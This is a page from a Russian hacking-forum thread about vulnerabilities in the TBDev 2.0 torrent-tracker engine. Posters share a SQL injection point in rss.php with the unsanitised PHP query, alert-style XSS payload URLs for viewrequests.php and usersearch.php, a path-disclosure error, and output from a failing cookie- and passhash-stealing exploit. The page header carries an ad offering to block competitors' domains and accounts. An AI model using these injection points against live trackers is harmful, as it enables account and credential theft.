Трекер-движок TBDev 2.0

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Трекер-движок TBDev 2.0

Страница 14 из 27

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#131

03.07.2009, 19:10

~~YouSeeBeter~~

Banned

Регистрация: 02.07.2009

Сообщений: 3

С нами: 8873666

Репутация: 0

эксплоит Qwazar'a как-будто вымер.

Сейчас тестировал его на чистом SKy tracker где есть уязвимость:

Trying to get your cookies... [DONE]
Trying to get passhash:
Exploit failed

Проверьте сами, даже где пахал не пашет, помогите...

#132

06.07.2009, 23:18

Rostov114

Познающий

Регистрация: 05.09.2008

Сообщений: 33

С нами: 9305379

Репутация: 29

Отправить сообщение для Rostov114 с помощью AIM

Отправить сообщение для Rostov114 с помощью Yahoo

Цитата:

Сообщение от YouSeeBeter

Проверьте сами, даже где пахал не пашет, помогите...

Cнимай штаны и бегай.
А по сабжу....проблема не в сплоите, а в тебе.

P.S. Простите не удержался.

#133

08.07.2009, 21:07

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

С нами: 9030566

Репутация: 2017

http://127.0.0.1/treker/rss.php?passkey=1'

SQL

Код:

$passkey = $_GET["passkey"];
if ($passkey) {
$user = mysql_fetch_row(sql_query("SELECT COUNT(*) FROM users WHERE passkey = '$passkey'"));
if ($user[0] != 1)
exit();
} else
loggedinorreturn();

XSS

http://127.0.0.1/treker/viewrequests.php?sort=%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E

P.S. сорр не бегал по всем страницам так что не знаю выкладывали или нет багу =)

http://127.0.0.1/treker/usersearch.php?r=%22%3Cscript%3Ealert(/XSS/)%3C/script%3E

=\ что то не понял...есть тут что нить или просто косяк кода?

во всех(или нет, не проверял) usersearch.php?....=%22%3Cscript%3Ealert(/XSS/)%3C/script%3E

такой косяк))))

Последний раз редактировалось HAXTA4OK; 08.07.2009 в 21:44..

#134

08.07.2009, 21:57

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

С нами: 9030566

Репутация: 2017

http://127.0.0.1/treker/userhistory.php?action=viewposts&id=x

x= id у которого нету постов как я понял ..и он выдаст ошибку ))) но SQL не провернуть так как нету таблы такой у меня

так что наверно к разряду раскрытие путей

#135

09.07.2009, 15:53

Yuna

Познающий

Регистрация: 22.06.2009

Сообщений: 41

С нами: 8887515

Репутация: 18

usersearch.php дыряв на XSS лучше чем решето =)))

#136

09.07.2009, 22:44

peonix

Познающий

Регистрация: 09.11.2008

Сообщений: 34

С нами: 9212732

Репутация: 2

Цитата:

Сообщение от Yuna

usersearch.php дыряв на XSS лучше чем решето =)))

а по подробнее можно? и в каких версиях?

#137

10.07.2009, 12:18

Yuna

Познающий

Регистрация: 22.06.2009

Сообщений: 41

С нами: 8887515

Репутация: 18

во всех

#138

12.07.2009, 01:13

peonix

Познающий

Регистрация: 09.11.2008

Сообщений: 34

С нами: 9212732

Репутация: 2

Цитата:

Сообщение от Yuna

во всех

напиши что за XSS ты узал если не трудно...

#139

12.07.2009, 11:42

Yuna

Познающий

Регистрация: 22.06.2009

Сообщений: 41

С нами: 8887515

Репутация: 18

для начала просто код откройте - нет проверки $_GET ваще никакой в файле...

#140

13.07.2009, 02:49

peonix

Познающий

Регистрация: 09.11.2008

Сообщений: 34

С нами: 9212732

Репутация: 2

Yuna
а через какой скрипт Вы в usersearch.php параметры передавали? просто так его вызвать нельзя...

Страница 14 из 27

« Первая

Последняя »

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Прошивку iPhone 2.0 взломали ещё до её выхода	geforse	Мировые новости. Обсуждения.	1	14.07.2008 22:41
Web 2.0 выходит на государственный уровень	vadim399	Мировые новости. Обсуждения.	2	12.01.2008 18:06
Проложение витых пар в городских домах	Рогатый Трупоед	"Железо"	11	20.09.2004 09:08

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход